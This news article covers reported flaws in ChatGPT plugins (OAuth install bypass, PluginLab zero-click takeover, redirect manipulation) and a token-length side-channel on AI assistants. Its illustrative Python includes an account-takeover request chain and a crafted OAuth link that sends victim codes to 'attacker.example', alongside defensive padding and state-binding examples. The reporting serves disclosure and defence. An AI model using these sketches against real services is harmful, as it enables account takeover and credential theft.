Third-party ChatGPT plugins may lead to account takeover

Cybersecurity researchers have found that third-party plugins available for OpenAI ChatGPT may act as a new attack surface for threat actors looking to gain unauthorized access to sensitive data.

According to new research published by Salt Labs, security flaws found directly within ChatGPT and its ecosystem could allow attackers to install malicious plugins without users’ consent and hijack accounts on third-party websites like GitHub.

ChatGPT plugins, as the name suggests, are tools designed to run on top of large language models (LLMs) for the purpose of accessing up-to-date information, running calculations, or accessing third-party services.

OpenAI has also since introduced GPTs, which are versions of ChatGPT optimized for specific use cases while reducing dependencies on third-party services. Starting March 19, 2024, ChatGPT users will no longer be able to install new plugins or create new conversations with existing plugins.

One of the flaws uncovered by Salt Labs involves exploiting the OAuth workflow to trick a user into installing an arbitrary plugin, taking advantage of the fact that ChatGPT does not verify that the user actually initiated the plugin installation.
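The missing check is analogous to an OAuth flow without a state binding: nothing ties the approval link back to the user who started the installation, so a victim who opens an attacker-crafted approval link completes the install unknowingly. The sketch below illustrates the kind of binding whose absence was reported; the function and parameter names are assumptions for illustration only, not OpenAI’s actual implementation.

import secrets

# Illustrative only: shows the concept of binding an install flow to the user
# who initiated it, which is the check reportedly missing from ChatGPT.
pending_installs = {}  # state value -> user who started the install

def start_install(user_id: str) -> str:
    # Issue a one-time state value when the user clicks "install plugin".
    state = secrets.token_urlsafe(16)
    pending_installs[state] = user_id
    return state

def finish_install(user_id: str, state: str, approval_code: str) -> bool:
    # Only complete the install if this user is the one who initiated it.
    initiator = pending_installs.pop(state, None)
    if initiator != user_id:
        return False  # attacker-supplied link: reject the installation
    # ...exchange approval_code with the plugin's OAuth server here...
    return True

state = start_install("victim")
assert finish_install("victim", state, "code-from-oauth-provider")
assert not finish_install("victim", "state-forged-by-attacker", "attacker-code")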

This could effectively allow threat actors to intercept and exfiltrate all data shared by the victim, which may contain proprietary information.

The cybersecurity firm also discovered issues with PluginLab that could be weaponized by threat actors to carry out zero-click account takeover attacks, allowing them to take control of an organization’s account on third-party websites like GitHub and access its source code repositories.

Security researcher Aviad Carmel explained, “‘auth.pluginlab(.)ai/oauth/authorized’ does not authenticate the request, which means the attacker can insert another member ID (i.e., the victim’s) and obtain a code that represents the victim. With that code, he can use ChatGPT and access the victim’s GitHub.”

The victim’s member ID can be obtained by querying the endpoint “auth.pluginlab(.)ai/members/requestMagicEmailCode”. There is no evidence that any user data has been compromised using the flaw.
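Taken together, the two endpoints describe a zero-click chain: look up the victim’s member ID, then request an authorization code on their behalf. The sketch below only mirrors the flow as described; the host is a placeholder, and the request parameters and response fields are assumptions, not PluginLab’s documented API.

import requests

# Placeholder host; the research names the endpoints on auth.pluginlab(.)ai.
BASE = "https://auth.pluginlab.example"

# Step 1: obtain the victim's member ID from the unauthenticated endpoint.
resp = requests.post(f"{BASE}/members/requestMagicEmailCode",
                     json={"email": "victim@example.com"})    # assumed payload
member_id = resp.json().get("memberId")                       # assumed field

# Step 2: request an OAuth code for that member ID; the endpoint reportedly
# did not verify that the caller actually is that member.
resp = requests.get(f"{BASE}/oauth/authorized",
                    params={"memberId": member_id})            # assumed parameter
victim_code = resp.json().get("code")                          # assumed field

# Step 3: with that code, ChatGPT treats the attacker's plugin session as the
# victim's, exposing whatever the plugin can reach (e.g., GitHub repositories).
print(victim_code)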

An OAuth redirection manipulation bug was also found in several plugins, including Kesem AI, that could allow an attacker to steal the account credentials associated with the plugin itself by sending a specially crafted link to the victim.
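In a redirect-manipulation bug of this kind, the authorization endpoint accepts an attacker-supplied redirect_uri, so the code or token issued for the victim is delivered to a server the attacker controls. The link below is a generic illustration; the domains and parameters are placeholders, not the affected plugins’ real endpoints.

from urllib.parse import urlencode

# Generic illustration of OAuth redirect manipulation; all values are placeholders.
authorize_url = "https://auth.plugin.example/oauth/authorize"
params = {
    "client_id": "plugin-client-id",
    "response_type": "code",
    # The flaw: redirect_uri is not checked against an allow-list, so the
    # victim's authorization code is sent to a host the attacker controls.
    "redirect_uri": "https://attacker.example/collect",
}
crafted_link = f"{authorize_url}?{urlencode(params)}"
print(crafted_link)  # sent to the victim; opening it leaks their credentials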

This development comes just weeks after Imperva detailed two cross-site scripting (XSS) vulnerabilities in ChatGPT that could be chained together to seize control of any account.

In December 2023, security researcher Johann Rehberger demonstrated how malicious actors could create custom GPTs that could phish for user credentials and transmit the stolen data to an external server.

New remote keylogging attack on AI assistants

These findings also follow new research published this week about an LLM side-channel attack that uses token length as a covert means to extract encrypted responses from AI assistants on the web.

“LLMs generate and send responses as a series of tokens (similar to words), with each token transmitted from the server to the user,” said a group of academics from Ben-Gurion University and the Offensive AI Research Lab.

“While this process is encrypted, sequential token transmission exposes a new side-channel: the token-length side-channel. Despite encryption, the size of the packets can reveal the length of the tokens, potentially allowing attackers on the network to infer sensitive and confidential information shared in private AI assistant conversations.”

This is accomplished through a token-guessing attack designed to decipher responses in encrypted traffic by training an LLM capable of translating token-length sequences into their natural-language equivalents (i.e., plaintext).

In other words, the core idea is to intercept real-time chat responses with the LLM provider, use the network packet headers to infer the length of each token, extract and parse the text segments, and leverage a custom LLM to infer the response.
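As a rough illustration of that pipeline, the sketch below converts a captured sequence of streamed packet payload sizes into estimated token lengths and hands them to a stubbed inference step. The packet sizes, the fixed framing overhead, and the stand-in model are all assumptions for illustration, not the researchers’ actual setup.

def token_lengths(payload_sizes, framing_overhead=5):
    # In streaming mode each chunk typically carries one token, so payload
    # size minus a constant framing overhead approximates the token's length.
    return [max(size - framing_overhead, 0) for size in payload_sizes]

def infer_plaintext(lengths):
    # Stand-in for the fine-tuned LLM that maps token-length sequences to
    # likely plaintext; here it just echoes the lengths as placeholder words.
    return " ".join("#" * n for n in lengths)

# Hypothetical payload sizes sniffed from encrypted but length-revealing traffic.
captured_sizes = [9, 7, 12, 6, 10]
lengths = token_lengths(captured_sizes)   # -> [4, 2, 7, 1, 5]
print(lengths)
print(infer_plaintext(lengths))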

The two key prerequisites for pulling off the attack are an AI chat client running in streaming mode and an adversary capable of capturing the network traffic between the client and the AI chatbot.

To counter the effectiveness of the side-channel attack, it is recommended that companies developing AI assistants apply random padding to obscure the actual length of tokens, transmit tokens in larger groups rather than individually, and send complete responses all at once instead of in a token-by-token fashion.
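A minimal sketch of the padding idea, assuming a simple length-prefixed framing: each token is padded with a random amount of filler before transmission, so the observed packet size no longer maps directly to the token’s length.

import os
import random

def pad_token(token: str, max_pad: int = 16) -> bytes:
    # Prefix the real length so the receiver can strip the padding again,
    # then append a random amount of filler to mask the true token size.
    body = token.encode("utf-8")
    return len(body).to_bytes(2, "big") + body + os.urandom(random.randint(0, max_pad))

def unpad_token(packet: bytes) -> str:
    real_len = int.from_bytes(packet[:2], "big")
    return packet[2:2 + real_len].decode("utf-8")

packet = pad_token("confidential")
assert unpad_token(packet) == "confidential"
print(len(packet))  # varies from run to run, hiding the actual token length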

The researchers concluded, “Balancing security with usability and performance presents a complex challenge that requires careful consideration.”
